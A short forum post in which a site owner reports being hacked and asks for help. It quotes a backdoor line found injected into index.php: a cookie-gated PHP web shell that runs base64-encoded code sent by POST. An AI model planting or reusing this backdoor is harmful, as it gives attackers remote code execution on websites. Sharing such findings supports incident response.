We found that we had an issue with login as well today. We now know we have been hacked – index.php and xmlrpc.php were changed and we found this line in index.php:
<?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>
Anyone who can help please let me know..
Thanks